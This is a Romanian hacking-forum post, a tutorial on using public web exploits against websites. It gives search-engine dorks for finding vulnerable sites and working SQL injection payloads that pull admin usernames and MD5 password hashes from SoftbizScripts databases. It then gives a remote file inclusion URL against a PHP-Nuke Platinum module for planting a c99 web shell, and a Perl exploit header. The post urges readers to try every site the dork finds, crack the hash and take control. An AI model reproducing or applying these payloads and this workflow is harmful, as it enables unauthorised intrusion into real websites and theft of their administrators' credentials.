HackPedia - Comunitatea Hackerilor Romani
Hacking, it security, programming, vulnerability, games, newsletter, it and c, programare, ethical hacking, exploits, information security, penetration testing, online security, web hacking,internet, antivirus, security, blocker, firewall
|
Lista Forumurilor Pe Tematici
|
HackPedia - Comunitatea Hackerilor Romani | Inregistrare | Login
POZE HACKPEDIA - COMUNITATEA HACKERILOR ROMANI
Nu sunteti logat.
|
Nou pe simpatie:
simona2000
 | Femeie
25 ani
Galati
cauta Barbat
25 - 53 ani |
|
|
Fire7
Membru Freak
Inregistrat: acum 16 ani
Postari: 113
|
|
M-am gandit sa Fac acest tutorial ca sa va pot ajuta sa avansati si sa stiti cum sa folositi un exploit
1.)Ce este un exploit(degeba pornim la drum daca nu se stie ce este un exploit) ?
Raspunsul este ca "Un exploit este un program care se foloseste de erorile si bug-urile din alte programe, permitand unui atacator sa dea anumite comenzi luand controlul asupra Site-ului afectat.
Sunt exploituri care se folosesc pentru a patrunde prin vulnerabilitatile unui calculator pentru a primi administrator (windows) sau rooter(linux) dar noi ne vom ocupa azi doar de exploiturile folosite pentru a patrunde prin vulnerabilitatile site-urilor.
In ceea ce urmeaza o sa prezint 3 tipuri de exploituri:
*SQL Injection ( veti gasi un user si o parola criptata in md5 care trebuie decripata)
*RFI (Remote file inclusion)( o sa aveti nevoie si de un shell)
*Exploituri care se compileaza(voi vorbi despre cele cele care se compileaza in perl)
Deci sa incepem :
!!! SQL INJECTION
Tehnica SQL injection da posibilitatea unui atacator sa execute comenzi SQL neautorizate profitand de oportunitati neortodoxe de intrare in aplicatiile web construind interogari SQL dinamice.[color]
Haideti sa cautam un exploit Cheesy o sa folosesc unul de pe milw0rm. (cand o sa stiu ff bine programare sql o sa fac eu exploituri pana atunci o sa folosesc milw0rm)
DORK: "Powered by SoftbizScripts" "ALL JOBS"
#Injection Adress :[sql cod] #
#Sql code For see UserName: 999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*
#Sql code For see Password : 999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*
#
#Admin panel for login:http://site.com/admin/index.php
|
Exploitul ne prezinta un dork:"Powered by SoftbizScripts" "ALL JOBS" , ce facem cu acest dork? il punem intr-un motor de cautare si cautam site-uri. Ex:
Dupa cum ati observat in poza exploitul a mai fost folosit deorece apare un site "hacked" dar asta nu e important deoarece este important ca voi sa intelegeti cum sta treba cu SQL injection
Am luat acest exploit la intamplare si se pare ca majoritatea site-urilor au fost hackerite, imi cer scuze dar nu mai am timp sa caut altul dar sa va explic cum sta treba.
Dupa ce ati dat search ca in poza pusa de mine vor aparea o multime de site-uri unele vulnerabile altele nu, trebuie sa le incercati pe tote pe rand:HAHA:, deci intrati in fiecare site si incepte sa faceti urmatorele dupa numele site-ului puneti urmatorul cod care ni-l prezinta exploitul /browsecats.php?cid=[sql cod]
-[sql cod] in inlocuiti de doua ori o data cu "999999%20union/**/select/**/0,sb_admin_name,2,3/**/from/**/sbjbs_admin/*" pentru a afla numele adminului si o data cu "999999%20union/**/select/**/0,sb_pwd,2,3/**/from/**/sbjbs_admin/*" pentru a putea afla parola, parola va fi criptata in md5 va fi ceva de genul asta "d41d8cd98f00b204e9800998ecf8427e" acum trebuie decriptata pt asta putefi folosi milw0rm apui nu trebuie sa faceti altceva decat sa va logati cu userul si parola gasita si aveti control asupra site-ului.
Sa trecema mai departe :
RFI (Remote file inclusion)
Cu aceasta vulnerabilitate, puteti introduce un shell, sau un script php intr-un anumit site vulnerabil.
Deobicei, cei care folosesc RFI, uploadeaza un shell sau NetCat (pentru a roota site-ul).
Acum sa laegem un exploit pt RFI o sa alegem tot un exploit de pe milw0rm:
Vulnerability Type: Remote File Inclusion
Vulnerable file: /Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php
Exploit URL: http://localhost/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: nuke_bb_root_path
Line number: 24
DoRk:Powered by Platinum 7.6.b.5
|
In cazul la RFI veti nevoie de un shell(evil cod)
Ce este un shell? Shellul este un exploit special specializat sa intre pe o anumita vulnerabilitate si sa returneze valorile scriptului.
Un exmplu de shell este c99: (un shell gata uploadat)
procedatati ca si la sql injection cautati prin dork, apoi incepeti a testa site-urile astfel-urile vostre.com/Platinum 7.6.b.5 Php_Nuke_Fusion/public_html/modules/Forums/favorites.php?nuke_bb_root_path selul tau adick in cazul nostru punem shellul asta) Partea buna la Rfi este ca trebuie decripata nici o parola caci intri direct in site iti pare intregul script, avand posisbiliatea de a modifica indexul sau alte documente de pe site.
Si in sfarsit a treia categorie:
Exploituri care se compileaza in perl
Aceste exploituri arata ceva de genul
#!/usr/bin/perl
#
# OneCMS v2.4 Remote SQL Injection Exploit
#
# Description
# -----------
# OneCMS contains a flaw that allows an attacker to carry out an SQL
# injection attack. The issue is due to the userreviews.php script not
# properly sanitizing user-supplied input to the 'abc' variable. This may
# allow an attacker to inject or manipulate SQL queries in the backend
# database if magic_quotes_gpc = off.
# -----------
# $Id: milw0rm_onecms.pl,v 0.1 2007/09/19 15:02:12 str0ke Exp $
Aici urmeaza codurile exploitului
|
Aveti nevoie Active perl pentru a putea compila exploitul.
Luati exploitul dorit in puneti in notepad ii dati ce nume vreti dar puneti extensia .pl
exploiturile se mai po compila in c++, in vb, in python etc
imi cer scuze pentru orice eroare facuta, pentru orice gresela de exprimare si alte greseli, promit ca o sa caut exploituri bune si o sa fac si alte tutoriale cu rfi si sql injection, ca sa intelegeti perfect, astept intrebari
|
|
| pus acum 16 ani |
|
